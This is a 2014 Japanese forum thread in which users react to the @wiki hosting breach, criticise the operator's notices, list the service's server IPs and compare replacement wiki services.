やめろや・・・
公式は現在のところ、ウイルスの類は確認されてないって言ってる
現在のところ
>>512 あえてこんな危険なときに閉鎖しに行く必要はないでしょ
事態が落ち着いてきてからでもぜんぜん遅くないと思うけど
移行先でおすすめ教えてください
広告無しのところでお願いします
@wikiの運営が対応しそうにないと見て
他の避難先探してる住人も出始めてる
@wikiにどうしても残りたいなら止めないけど
過去にやらかしてまたやっちゃったから
信用ないし他のサービスに移るのがいいかもな
519 :
名無しさん@お腹いっぱい。:2014/03/10(月) 17:36:16.71
520 :
名無しさん@お腹いっぱい。:2014/03/10(月) 17:47:20.78
FC2wiki使いやすいけどテンプレートいじれないのかこれ
サーバーを停止しない
=原因を究明する気がない または 原因を究明するスキルがない
このどちらかしかない。もしくは両方。
FC2wikiと@wikiの違いを書いてみる
(管理者として使ってみて不便と思った点だけ)
【不便な点】
・コメント毎のIPアドレスがわからない
・wiki全体のバックアップがない
・画像にリンク設定が出来ないのでバナー画像ががが
・外部リンクで飛ぶと間にクッションページがある
いくつかはFC2リクエストで何年も要望されてるようだが
運営からの返答がない状態だね。
>>520 管理者権限あればいじれるぜ。
管理画面の「デザイン」から[デザイン作成・編集]を選んでくと
CSSがいじれるので、これは@wikiと同じように変更出来た。
FC2 wikiって管理人限定ページ作れないよね
>>522 FCwikiのセキュリティはどうなん?
他の無料wikiと比べたら安全な方かな?
>>496 わかっtぞ、うんえいもぐるなんだな!!!!!!
セキュリティを重視したいな
こんなことがあった後だから
528 :
名無しさん@お腹いっぱい。:2014/03/10(月) 18:05:38.92
>>523 ありがとう
やってみる
pukiwikiとかも試さんとなぁめんどくせえ
atwikiのプラグイン自体は結構便利なんだけどなぁ
wikiwikiが評判いいみたいだけどどうなん?
ページ数が多くて困ってる人、
自分のウィキのSQLダンプを取得しとけばよかったなw
取得しとけば一括で移行できるぜ?w
533 :
名無しさん@お腹いっぱい。:2014/03/10(月) 18:15:47.72
あ
アットWikiってまだ危険なの?
いつ頃から踏んでも大丈夫なん?
踏んで確認してくれば?
もしかしたら色々できない不便なほうがセキュリティ的にいいのかもしれんな
Javascriptが設置出来るかどうかとか
疑ってるならやめとけ
アクセスした結果何があったのかきちんと検証できるスキルがある奴なんて2chなんかには来ないだろ
とにかく不安な人は共有レンタルなんか触らんしかないなぁ
共有ではない(高い)レンタルサーバーを借りて、自前で設置しよう
>>525 う〜ん、専門家ってわけじゃないし
サーバーをどう保守してるかまではわからないなぁ
そのすごいやつはここに質問しになんてこないだろw
スキル高い人がいたとして、ご丁寧に情報提供してくれるとは限らんぞ
どんだけ他力本願なんだよ
誰もお前のことなんてすごいなんて言ってないよ
問題なのはそのスキルある人がatfreeksにもいないということ
早くバックアップ復活させろ無能
バックアップ復活でウイルス拡散ですね
aguseでパズドラwikiのSS見たみたけど平常運転なんだよなあ
逆に怖い
その会社がブラック企業だったりするとあまりに風通しが良すぎて社内がスカスカになったり素人集団化するのは稀に良くあること
>>552 アットフリークスってF欄でも受かりそう
鯖に侵入してるやつはサイトを見にきた奴にウイルスぶっかけるよりも
鯖自体から面白そうな情報を掘り出すの事の方が興味あるんじゃないか
広告無いwikiでお勧め教えて
>>353 ブラウザからソースを見れないのにブラウザはどうやって表示してると思ってるんだ?
これ結局、公式からの脆弱性対応は未だなされていない、って認識で良いの?
要はウイルス仕込まれたり攻撃の踏み台にされたりページ改竄されたり、っていう危険性が
未だにあるんだね?(あくまで危険性の話)
@wikiへのリンクは外すよう勧めるべきか迷ってるんだけど・・
移転先探しで色々見たけど一長一短だな
デザイン捨てるかプラグイン捨てるかで迷う
seesaaWIKI
したらば重いのでseesaaは死んで、どうぞ(真顔)
wikiとしては普通っぽい。でも管理機能弱い気がするんで荒らしが出る可能性があるwikiには向かない気がする
fc2wiki
知らん
wicurio
CSwiki
微妙
wikia
論外
wikiwiki
プラグインとか管理機能は比較的高機能。規制関係強めか
デザインが基本的にテンプレ変更だけっぽいのと一括凍結・解除できないのがネック
gamedb
高機能だけどプラグインは控えめ?
ゲーム攻略wiki
デザイン面やらなんやら色々高機能だけど管理機能が微妙に弱い
560 :
名無しさん@お腹いっぱい。:2014/03/10(月) 18:40:26.30
結局@wikiが便利だから流行してたんだろうなぁ
だから被害も大きいと
>>554 そういうのが大体やりたい事が済んだからスレ立てして騒ぎ立てた結果パスワード
変更ページに唐澤貴洋画像仕込む奴とか流入してきてる訳じゃないの
562 :
名無しさん@お腹いっぱい。:2014/03/10(月) 18:42:38.00
結局、どうなったんだ?
まさかと思うがまだサーバー動かしてるんじゃないよな…?
いくらここばバカでも流石にそれはないか…
@Wiki便利だったのにな………南無
Pukiwikiってどうなん?
NGワードをわざわざ表示したりマヌケな仕様も多かったけど機能自体は多かったからな
便利ではあった
悪意とか関係なしに、自動的に穴のあるサーバーを攻撃したり踏み台にするbotとかあるから
ポケモン育成論のWiki、移転大変だろーな
>>561 実態はやった本人にしかわからんな
第三者でそれを見極められるような奴は現れないだろうね
>>562 お気に入りに入ってたwikiいくつか適当にaguseに特攻してもらったけど、普通に鯖生きてるよ
atwiki、機能自体は便利なんだよなぁ……
それだけに一連の騒ぎは非常に残念だわ
>>567 こういうときは真っ先に自分の情報をダウンロードするもんよ
自分のどんな情報が漏洩してるか把握するためだ
運営が被害サーバーを過少申告してるせいで、
未だに自分の情報は漏洩してないと思い込んでる人が多い
銭づらぁぁ!
>>572 業者か?
パズドラwikiの管理人だんまりのままだけど
ステマ?笑
>>572 軽く調べてみたけど、Gamerch.comで攻略Wikiを作ったら240PV=1円だったらしい
早く閉鎖して欲しい
閉鎖したら移行も促進されるだろ
583 :
572:2014/03/10(月) 18:56:22.43
>>578 更新履歴を見ると避難場所として
昔からあったみたいだけど、
今回の件を受けて移転するんじゃないかな。
中のコメント読むとそんな感じ。
>>582 一定期間更新しないと削除ってのがダメだな
gamerchは公式がゴチャゴチャだったので割とどうでもいい
>>571 デザイン面重視しないなら悪くないと思う
ゲーム関係じゃないwikiで、seesaaとFC2にピンと来ないならとりあえずwikiwikiでいいんじゃないかね
結局どんな使いかたしてたかによるんだよな
うちは動画関係やら規制機能やら充実してないと困るから選択肢狭いわ
fc2wikiは利用した事はないけど、fc2ブログは結構不安定になることが多くて
個人で使う分にはいいけど、wikiとなると不安だな
まあ毎日人がたくさんくるような人気wikiでもないんだけどさ
まずfc2という時点でうさんくさい
592 :
名無しさん@お腹いっぱい。:2014/03/10(月) 19:05:46.04
>>564 インターネットに繋がないローカルな範囲で使うならいいソフトだと思うよ
Swikiは一部かな?HTMLタグが使えるみたい
今来た、今までatwiki見まくってたわ
どうすっかなぁ
http://www.kooss.com/wiki/ ここを見てる限りだとSeesaa wikiかFC2(名前だけで嫌なんだけど)がよさ気だけど評判はどうなの?
Seesaa wikiの良い点
・デザイン:テンプレート,レイアウト変更,CSS編集,html編集(フリーエリア)
・その他:アクセス解析。書き込み閲覧権限設定可,プラグイン
FC2の良い点
その他:RSS,QRコード,編集権限設定,非公開設定可,復元ポイント,禁止ワード,公開プロキシ規制,更新履歴
嫌儲の観点の話題はどっか他でやってください
セキュリティ的にはそんな話どうでもいいので
598 :
595:2014/03/10(月) 19:28:55.33
>>596 入ってくる金なんてどうでもいいんですよ
セキュリティ的な部分はやっぱり大差ないもんなの?
そういや流出したメアドに迷惑メールまだ来ない(´・ω・`)
>>602 うわ、見落としてたわ
FC2却下だな。教えてくれてありがとう
できれは商用利用不可のところが良いですね
角が立たない
>>596 ここは、2ちゃんねる運営、open2ch運営、嫌儲、アフィといろんなのが混じってるからな
atwikiの広告だけ受け入れて後は1銭も貰わずにいた者にとっては非常に迷惑な話。
atwikiから乗り換えるんならpukiwiki使ってるところがやりやすいんだろうが
wikiwikiとswikiくらいしか見たこと無いな
607 :
名無しさん@お腹いっぱい。:2014/03/10(月) 19:38:39.36
FC2はバックアップさえできればよさそうなんだがな
確かにどこ探してもローカルに保存できるバックアップがない
608 :
名無しさん@お腹いっぱい。:2014/03/10(月) 19:38:42.29
609 :
名無しさん@お腹いっぱい。:2014/03/10(月) 19:40:25.12
>>521 共用で停止できないの間違いだろ
それくらいしてる可能性がある
何と共有してんのか言ってみろよ
atwiki踏んでしまった
まだ問題あったんか・・・
俺と
おい!俺の彼女横取りすんなよ!
急にアクセスできなくなった
落ちた?
遂に鯖落とした?
鯖停止きた?
つながった
ダメじゃん
621 :
名無しさん@お腹いっぱい。:2014/03/10(月) 19:52:16.66
一旦落ちて起動とかこえええ
またなんか仕掛けられたんじゃないだろうな
全ページを自分のパソコンにバックアップするような機能はないのか・・・
そうやって一々引っ掛けみたいなことすんのやめろよ胸糞悪い
624 :
522:2014/03/10(月) 19:53:32.99
>>523と
>>543と
>>572と
>>583は自分です。
なんでかよくわからんが、死ね言われても…。
匿名でも自分の品位を下げる発言はオススメしないぜ。
ところで、自分も管理人してるとこ3つあって1つはFC2にしてみた。
色々迷うね。
くっさ
www1.atwiki.jp 183.177.145.34
www2.atwiki.jp 183.177.145.35
www3.atwiki.jp 183.177.145.36
www4.atwiki.jp 183.177.145.37
www5.atwiki.jp 183.177.145.38
www6.atwiki.jp 183.177.145.40
www7.atwiki.jp 183.177.145.43
www8.atwiki.jp 183.177.145.44
www9.atwiki.jp 183.177.145.46
www10.atwiki.jp 27.96.33.187
www11.atwiki.jp 183.177.145.48
www12.atwiki.jp 183.177.145.49
www13.atwiki.jp 27.96.33.135
www14.atwiki.jp 115.179.106.69
www15.atwiki.jp 183.177.145.41
www16.atwiki.jp 183.177.145.51
www17.atwiki.jp 183.177.145.52
www18.atwiki.jp 183.177.144.98
www19.atwiki.jp 183.177.145.53
www20.atwiki.jp 183.177.145.60
www21.atwiki.jp 27.96.58.204
www22.atwiki.jp 183.177.144.227
www23.atwiki.jp 183.177.144.243
www24.atwiki.jp 183.177.144.229
www25.atwiki.jp 183.177.144.230
www26.atwiki.jp 27.96.58.189
www27.atwiki.jp 183.177.144.233
www28.atwiki.jp 183.177.144.234
www29.atwiki.jp 27.96.58.188
www30.atwiki.jp 27.96.58.205
www31.atwiki.jp 183.177.144.237
www32.atwiki.jp 210.255.109.28
www33.atwiki.jp 27.96.33.136
www34.atwiki.jp 183.177.144.239
www35.atwiki.jp 183.177.144.240
www36.atwiki.jp 27.96.33.172
www37.atwiki.jp 27.96.33.173
www38.atwiki.jp 115.179.106.71
www39.atwiki.jp 27.96.33.175
www40.atwiki.jp 27.96.33.176
www41.atwiki.jp 27.96.33.186
www42.atwiki.jp 115.179.106.98
www43.atwiki.jp 27.96.58.244
www44.atwiki.jp 27.96.58.228
www45.atwiki.jp 27.96.58.234
www46.atwiki.jp 27.96.58.233
www47.atwiki.jp 27.96.33.130
www48.atwiki.jp 115.179.106.102
www49.atwiki.jp 115.179.27.131
www50.atwiki.jp 115.179.106.105
www51.atwiki.jp 61.205.54.10
www52.atwiki.jp 210.255.109.24
www53.atwiki.jp 115.179.106.114
www54.atwiki.jp 115.179.106.112
www55.atwiki.jp 115.179.106.113
www56.atwiki.jp 115.179.210.136
www57.atwiki.jp 115.179.106.106
www58.atwiki.jp 115.179.106.110
www59.atwiki.jp 115.179.106.108
www60.atwiki.jp 115.179.106.116
www61.atwiki.jp 115.179.27.136
匿名に死ねっていられることいちいち気にしてる時点で負け
自己紹介とかしないほうがいいよ
どうでもいいから
突然のリブート
何か仕込まれたかな?
煽られずに自分の意見アピールしたい構ってちゃんならブログかツイッターでもやってろよ
コテハンしてる時点で気色悪い
バックアップ復活したぞ
無駄に煽り合いしてレス埋めるのやめようぜ
したらばの現状を見てればシーサーがやる気ないのはよくわかる
>>630 うわ、派手に荒らされてるな
何処行けばいいんだよもう...orz
wikihouse
ってどうなの?
IPアドレス順
27.96.33.130 www47.atwiki.jp
27.96.33.135 www13.atwiki.jp
27.96.33.136 www33.atwiki.jp
27.96.33.172 www36.atwiki.jp
27.96.33.173 www37.atwiki.jp
27.96.33.175 www39.atwiki.jp
27.96.33.176 www40.atwiki.jp
27.96.33.186 www41.atwiki.jp
27.96.33.187 www10.atwiki.jp
27.96.58.188 www29.atwiki.jp
27.96.58.189 www26.atwiki.jp
27.96.58.204 www21.atwiki.jp
27.96.58.205 www30.atwiki.jp
27.96.58.228 www44.atwiki.jp
27.96.58.233 www46.atwiki.jp
27.96.58.234 www45.atwiki.jp
27.96.58.244 www43.atwiki.jp
61.205.54.10 www51.atwiki.jp
115.179.27.131 www49.atwiki.jp
115.179.27.136 www61.atwiki.jp
115.179.106.69 www14.atwiki.jp
115.179.106.71 www38.atwiki.jp
115.179.106.98 www42.atwiki.jp
115.179.106.102 www48.atwiki.jp
115.179.106.105 www50.atwiki.jp
115.179.106.106 www57.atwiki.jp
115.179.106.108 www59.atwiki.jp
115.179.106.110 www58.atwiki.jp
115.179.106.112 www54.atwiki.jp
115.179.106.113 www55.atwiki.jp
115.179.106.114 www53.atwiki.jp
115.179.106.116 www60.atwiki.jp
115.179.210.136 www56.atwiki.jp
183.177.144.98 www18.atwiki.jp
183.177.144.227 www22.atwiki.jp
183.177.144.229 www24.atwiki.jp
183.177.144.230 www25.atwiki.jp
183.177.144.233 www27.atwiki.jp
183.177.144.234 www28.atwiki.jp
183.177.144.237 www31.atwiki.jp
183.177.144.239 www34.atwiki.jp
183.177.144.240 www35.atwiki.jp
183.177.144.243 www23.atwiki.jp
183.177.145.34 www1.atwiki.jp
183.177.145.35 www2.atwiki.jp
183.177.145.36 www3.atwiki.jp
183.177.145.37 www4.atwiki.jp
183.177.145.38 www5.atwiki.jp
183.177.145.40 www6.atwiki.jp
183.177.145.41 www15.atwiki.jp
183.177.145.43 www7.atwiki.jp
183.177.145.44 www8.atwiki.jp
183.177.145.46 www9.atwiki.jp
183.177.145.48 www11.atwiki.jp
183.177.145.49 www12.atwiki.jp
183.177.145.51 www16.atwiki.jp
183.177.145.52 www17.atwiki.jp
183.177.145.53 www19.atwiki.jp
183.177.145.60 www20.atwiki.jp
210.255.109.24 www52.atwiki.jp
210.255.109.28 www32.atwiki.jp
@wikiとwikipediaって別物なんだな
常識だろ
流石に情弱すぎんだろ…
こういうアホなこと抜かす奴はネットしないほうがいいよ
さすがにネタだろ
バカが自分のスペック知らずに手を出すからからこうなるだよ
無知さらけ出して恥ずかしいぞ
アンサイクロペディアとかも同じ系統だと思ってそう
釣られすぎだぜお前ら
ウィキリークスも同じだと思ってそうだな
で、Wikiをバックアップする手段って今ないわけ?
実際ろくに調べずに見たけど大丈夫ですか?とか聞きに来るAHOがちらほらいるから困る
無知はどうでもいいからスルー推奨
簡易まとめ。個人がまとめたものなんで信頼はするな。
【何が起こったの?】
@Wikiのサーバーがクラックされた。
現在のところ確定している被害は以下の3つ。公式でも明言されている。
1:各Wiki管理者および登録ユーザーのパスワード(暗号化されてるが比較的簡単に解読可能)とメールアドレスが流出した
2:一部のWikiにリダイレクト(別のサイトに飛ばす処理)をするスクリプトが仕込まれた
3:@wikiの「パスワード再発行ページ」が改竄された
1はパスワードの使い回しをしていなければぶっちゃけ神経質になることじゃない。メルアドを知られることすら嫌なら捨てアド作らなかったお前が悪い。
2はそもそも@Wikiの仕様でページにJavascriptを仕込めること自体に問題があって、クラック以前の問題。見る側もセキュリティはちゃんとしとけ。
一番問題なのは3で、「ユーザー側には弄りようがないファイルを弄られた」ということは、サーバーの管理者権限かそれに近い致命的な権限を奪われたことになる。
そして現在このような状態に対策がなされたのか、今一つはっきりしていない。
クラックそのものの被害と情報流出からの二次被害が混同されたり、サーバーの管理者権限と各Wikiの管理人の権限が混同されたり、
いい加減な知識に基づいた憶測、悪意はあっても証拠はないデマ、運営会社の対応への不信etcによって非常に情報が錯綜している。
【何が問題なの?】
最大のポイントは「@Wikiの対応が信頼しきれず、リスクが推し量れない」という点に尽きる。
そもそもこんなクラックをされること自体が管理のずさんさを物語っているのだが、
こんな重大な問題が起こったのにサービスの一時停止どころか各Wikiトップに告知すらことすらしない運営会社の対応が不信を加速させている。
前述のパスワード再発行ページ改竄のような、サーバーの管理者権限についてきちんと穴が防いだかすら信用できないのが現状。
【速報】@wiki(アットウィキ)から漏洩した個人情報がウィキリークスでもリーク
で、平日になったのにいまだにまともに対処してないのかよ
場合によっては他人のウィルス設置により管理者責任が問われる可能性があるとか冗談じゃねえぞ
【アクセスしちゃったけど大丈夫?】
そもそもウイルス感染とJavascriptのスクリプトによる攻撃とではかなり深刻さが違う。
後者でも危険なサイトにリダイレクトされる可能性はあるが、それでもきちんとしたセキュリティ対策(Flashなどのアップデートetc)をしていればリスクは低い。
Javascript利用で他サービスのアカウント情報を盗み出すような手法もないではないが、真っ当なサイト(この場合は「他のサービス」の方が)なら対策済み。
閲覧だけでウイルスに感染、というのは絶対にありえないとは言えないという程度。
別途「アクセスしただけでウイルスに感染する脆弱性」を突かなければいけないからだ。@Wikiを乗っ取ろうが自前のスペースだろうがこの点は変わらない。
可能性で論ずるならネット自体危ない。
不審なファイルをDLしたり実行したりするなら別だが。
過去には実際「閲覧するだけで感染する」ウイルスが猛威を振るったことはあるが、新たに見つかればそのウイルス単体で大騒ぎになるレベルの大事。
ちょうど同時期に「画像にウイルスを仕込む」という話題も出てきたが、これも画像を見るだけでアウトというようなものではない。
他の攻撃手段と組み合わせて使うか、単体なら精々アンチウイルスソフトが仕込んだコードを検知して騒ぐ程度。
いずれも別に@Wikiに限ったリスクではない。スクリプトによる被害との混同、出来る可能性と実現性の混同が大きい。
そのレベルのヤバイ脆弱性を密かに見つけていたスーパーハカーが便乗犯の中に紛れ、@Wiki乗っ取りを利用して被害を拡大させようとしているというなら話は別だが。
【攻撃の踏み台にされたら逮捕されちゃう!?】
Javascriptによる攻撃も前述のように効果が限定的で、かつブラウザにソースを送らなきゃならないから分かる人にはすぐバレる。
PHP側に攻撃スクリプトを仕込まれたとした場合でも、これで踏み台にされるのは「@Wikiのサーバー」そのもの。
「誤認逮捕」されるとしてもサーバーの運営側。 これを誤認と言っていいのか微妙だが。
【@WikiでWiki借りてたんだけど大丈夫?】
被害そのものよりも、管理のずさんさを露呈したことがヤバイ。今後のリスク的にも風評的にも乗り換え推奨。
今退会処理してもいいかとは思われるが、どうしても不安ならしばらく放置してから退会すべし。
メールきたー
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
【お詫び】ウイルス/JS改ざん疑惑 及び ユーザ情報流出に関するお知らせ【第4報】
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
1.ウイルス疑惑について
2.Javascriptの改ざん疑惑について
3.@WIKI登録時のユーザ名について
4.クレジットカード番号の流出疑惑について
5.wikipediaと@wikiについて
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
1.ウイルス疑惑について
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
一部のサイトで、@wikiの各サイトにウイルスが混入していると見せかけた
画像が出回り、情報が錯綜しております。
引き続き調査をしておりますが、現在のところ、
ウイルスは確認されておりません。引き続き調査して参ります。
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
2.Javascriptの改ざん疑惑について
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
引き続き弊社で調査をしておりますが、現在のところ、
改ざんは確認されていません。引き続き調査して参ります。
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
3.@WIKI登録時のユーザ名について
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
第一報で公開いたしました「ユーザ名」ですが、@wiki登録時にある
「■ご希望のURLを入力 (半角英数字のみ入力できます)」
となります。ユーザ様の氏名ではございません。
また、会員登録にユーザー様の氏名を頂戴しておりません。
誤解を招く表現をし、誠に申し訳ございません。
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
4.クレジットカード番号の流出疑惑について
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
一部のサイトで、クレジットカード番号が流出したと書かれておりますが、
@WIKI会員登録に、ユーザ様のクレジットカード番号を頂戴/保存しておりません。
そのため、クレジットカード番号の流出はございません。
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
5.wikipediaと@wikiについて
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
一部のユーザ様からお問い合わせがございますが,
wikipediaと@wikiは類似のwikiという仕組みを利用しておりますが
関係ございません。
@wikiは、wikipediaのように誰でもwebページを作成/編集できる
システムの無料ホスティングサービスです。
ユーザ名と聞いて氏名と思い込む方がオカシイ
この部分だけは運営に同情できる
他はすべて×
クレジットカード番号が流出したって
クレカは共通のメアドパス使ってるやつじゃないの?
普通無料レンタルにクレカ情報なんて載せねーよ
誰だデマ拡散した奴は
>>659 Wikipediaと@wikiを混同するのも運営に同情する
4番と5番も同情はできる
1番と2番は信用できないってかメール出来るんならさっさとサーバー止めたらいかがです
>ユーザ名と聞いて氏名と思い込む方がオカシイ
こんな思い込みする奴に鯖落とせとか言われたらそら落としたくないわ
>>660 一瞬だけ「アフィ関係で〜」って話が出回ってたこともあったし、そこらへんを信じたのかもな
クレジット番号は●かなんかとひもつけてたんだろ多分って見かたを良く見るけど実際どうなんだろうな
第4報、情報量ほぼゼロやん
ttp://www1.atwiki.jp/guide/pages/2606.html つか「データの流出が確認したサーバ」被害のあった鯖のリストはこのまま訂正しないつもりなの?
なまじこのリストがニュースサイトで引用されたせいで、
「※影響範囲 現在登録中のユーザ全員」であるにもかかわらず、
このリストだけを見て「自分が使ってるwikiはリストになかった〜大丈夫だった〜」とかいってるアホが絶えないんだが?
>現在のところ
安全宣言はよ
とりあえず改竄とバックドアがなくなるまでだな
多分無理だろう。
>>665 SQLファイルが外部に存在している以上、
一覧にない鯖から漏洩してるのは間違いないのにな
この第○報とかいうメールもハッカーが送ってきたものじゃねーの?
一番知りたいのは
「どっから侵入されてバックドアしかけられたのかわかったのか」と
「その穴はちゃんとふさいだのか」なんだよ!
第4報クソ過ぎてワロタwww
>>531 wikiwikiは規制強めとされる分対中華対策は早い
数年前福建省の中華垢ハック組織がwikiページのリンクを自前の有為するドメインに書き換えるという攻撃を
フリーwiki、特にゲーム関連各所で行っていたがwikiwikiはすぐに対策を講じたため被害なし
当時はこのwiki攻撃に辟易してwikiwikiに引っ越すところも多数あった
安全とそのための規制、それをどう考えるかだな
大本営発表にもはや何ら信憑性を求めてはいない
ただ「メンテナンスを行うためサービスを停止します」とだけ言ってその通り実行しろってんだよクソが
674 :
名無しさん@お腹いっぱい。:2014/03/10(月) 20:45:12.61
SQLサーバみたいなのは、システムの利用率に応じてどんどんレンタルサーバで台数増やしていくサービスと
相性が悪い
金融系サーバとかは、ハウジングやら自社サイトで専用環境を作るから、
SQLサーバやらバックエンドのサーバはインターネットからアクセスが不可能な場所に置くが、
こういったレン鯖で台数増やしていくサイトの場合、
バックエンドサーバもインターネットから見える場所に置いて、
インターネット経由でアクセスできるようにするからなぁ
数ヵ月前から変なシステムメールみたいなのが大挙して来ると思ったらこれが原因か
>>672 90日以内に更新しない可能性があるからwikiwikiは選べない…
>>675 @wikiが原因なら数ヶ月じゃなく1年くらい前から来ててもおかしくない
ちなみにうちには未だに迷惑メール来てない
>>653 google検索ですらリダイレクトするのに
リダイレクトを防ぐ見る側のセキュリティって、どうやるんだ??
>>677 いつからだったかなぁ
消してるからたぶん残ってない
ちなみに管理してたwikiマン喫で見たけど大丈夫っぽい
ちょっと気になること
いつからか不明だけどブックマークのファビコンがたまに変わってたことがある
@じゃなくて女の子のキャラクター画像になってたりしたんだけどこれって今回の騒動と何か関係あるのだろうか
それともグーグルトップみたいにたまに変更する仕様だったりするのか
>>653,656
つまり運営ふざけんなってことでいいんかね
684 :
名無しさん@お腹いっぱい。:2014/03/10(月) 21:11:00.97
人間味あふれるこの一報が楽しみ
第5報はよ
faviconがすりかわるのはIEのバグだったはず
オラわくわくすっぞ
マイクラwiki開いちまった・・・javascriptブロックは偉大だね
>>658 「Wikipediaを閲覧するとクレカ情報が抜かれちゃうの!?」
と思い込んでの問い合わせが殺到したのかw
>>679 (スクリプトによるリダイレクトは)Javascriptを切ったりとかでも対処可能だが、
そもそもリダイレクトで変なサイトを踏んでもリスクがないようにしておくべき
>>683 そう。ただちに影響はないorあっても微弱か低リスクだが、だからといって運営がクソなことには一片も変わりはない
まずなんで閉鎖しないのよ
情弱の俺でもこれくらいはしろよと思うわ
>>676 wikiwiki免際事項
>90日間サイトの更新が一度も無い場合で、内容がほとんど無いまま放置されているサイトは
>こちらの判断でID(サイトデータ)を削除させて頂きます。
よく分からんけど90日間更新が無くても内容のあるサイトなら(ry
閉鎖したら金稼げなくなるだろ
検索避けを付けられそうなseesaaが魅力だったんだがな…
なんだかんだでアットwikiは楽だった
閉鎖せず稼動させ続けたところで
不安を払拭できなかったせいで他wikiに引越しされたら意味ないんだけどな
あぶねぇ
無意識にwiki開きそうになる
ホントwikiには世話になってたんだなぁ
全員移転するならまだしも多少は残るやつは確実にいる
今回の件で儲けも確実に減ると思うが0というわけじゃない限り閉鎖は難しいんじゃないかな
なんかもうお通夜会場になってんな
>>700 ことごとく後手に回ってる上に対策の目処も立たないままですし…
ログサルベージしたいけど今の@freeksにアクセスするのは尻込みしちゃうわ
うっかりマイクラWiki開いてもーた・・・
うっかりどっかりとか言ってるバカ大杉
もっと危機感もてよ
>>693 内容無いまま2011年から放置してるのに削除されなかったんだけど(憤慨)
>>700 そりゃまぁ運営側が今後なにをしてくれるのかが全くわからない状況だしね
勇気が無い俺みたいなやつは@wikiにアクセスできないから別サイトでパスワードを使いまわしてたらそのパスワードを変えるぐらいしかない
アクセスなら無問題という状態になれば立ち上げたwikiを閉鎖して退会することができるんだけど
>>705 大半の人はその状態だと思うけどね。俺もそう。
>>653 まとめ乙
やっぱ一番の問題はパスワード再発行ページの改竄だよね…
少なくともこの問題がはっきりしないと見るのも使うのも危なすぎる
>>685 firefoxの最新版でspeeddialを使ってる
元々管理画面で指定したファビコンが反映されないからもしかしたらspeeddialの問題かもしれない
>>686 元々似たような問題があったのか
>>690もありがとう
少なくとも今のところアクセスするだけで危険、ということは考えづらい。
(万一あったとすれば、ここまで気づかずにアクセスした人たちだけでも前代未聞のサイバー攻撃被害になるし、
その痕跡がほとんど見つかってない、騒ぎにならないというのは不自然過ぎる)
ただこの不信っぷりも全部運営自身の身から出た錆だし、
そんな運営の所為で万が一の万が一もないと言い切れなくて、安心していいとも言えないんだよなぁ
パスワード再発行ページが改竄されてる時点で笑いが止まらんわ
そもそもJavascriptを切ってる俺には関係のないことだな
よく使っているwikiが全て@wikiだからゲームが全然進まない
クラッカーはマジで死ねや
>>709 痕跡、というか、サーバー上のファイルをいじれるようなツールみたいなのがUPされてるのが何回か見つかってる
>>714 というかこれが、元々騒ぎの中で話題になったツールとそっくり
バックドアの1つなんじゃねーの
どうでもいいけど、あんまり拡散しない方がよいと思う
もしそれがセキュリティホールなんだったら、クラッカーの目に触れる機会も増えてしまうわけで
>>715 >>709の「痕跡」はあくまでアクセスしたユーザーに被害がでているかという話ね。
サーバーのリスクが真っ黒だからどのみち利用しない方がいいけれど
>>717 なるほど。はやとちったかな。すまない
どこまでの話を被害というか、だろうけど、一応運営からはリダイレクトの話が出てるね
それを踏んだ人がどのくらいいたのかは知らない
クレカ被害はありませんって2ch張り付いてるだけかよwwwwww死ねwwwwwwwww
4報の345わろた
馬鹿大量にいるんだな
721 :
名無しさん@お腹いっぱい。:2014/03/10(月) 22:33:09.31
>>657-658 知りたいのは脆弱性を封じたのかどうかなのに
どうでもいい情報送ってくるアホ運営
なんだこいつら
マルウェアのApplication.AdRegが検索で出てきたけど、
今回の件で感染したかどうか分からんな
アバストちゃんじゃ駆除してくれないっぽい
ヘッダーにX-Forwarded-Forでも付けて串っぽく振る舞いつつ
『犯行予告文をPOSTしますね^^あ、串の発信元はこのIPです^^』とかやられたら
ログを証拠にされて踏んだ人間がしょっ引かれる罠
踏んだ側には証拠残らないから運営が外部接続を適切に制限してた事を祈るのみ
ガラケーでアクセスしただけでは特に問題ないですか?
さっき誤って踏んでしまったのですが…
って言って欲しいだけだろ?
このスレにすらバカ大量に湧いてるんだから直のメールフォームとかやばいんだろうな
@wiki「もう好きにして♡」
atfreaksの大本営発表ってなんかソースは2ちゃん臭いのが気になる
管理してんの自分らなんだからもうちょっとしっかりした対応できてもいいんじゃないか
前スレとかでデマデマ言ってたのが@freaksの人だったりしてwちがうかw
このままじゃ引っ越しすら出来んじゃないか
社内に文系しかおらんの?ってなる対応
>>729 というかねらーに調べさせてる感すらある
実際ウイルスあるって報告がホントなのかがもうわからん
昔キン肉マンのフリゲページがウイルス地獄だったの思い出すけど
ガチでねらー頼みかよ……
ねらーに不具合調べさせるとかどこのエロゲ会社だよ
>>709 仮に今大丈夫でも、1時間後に大丈夫という保証がない、というのが現状だしなあ
ソフト開発者がねらーなのは昔も今もよくある話だろ
ここにいる人間なら周知のことと思ってたわ
開発者がねらーは当たり前だけど不具合対応がネット依存なのはちょっと…
>>657 メールにウィルス仕込まれてたら大笑いやねw
745 :
名無しさん@お腹いっぱい。:2014/03/10(月) 23:25:24.47
見てるんなら広告減らせよ
ページ下部だけで十分儲かってるだろ
サイドバーうぜえ
746 :
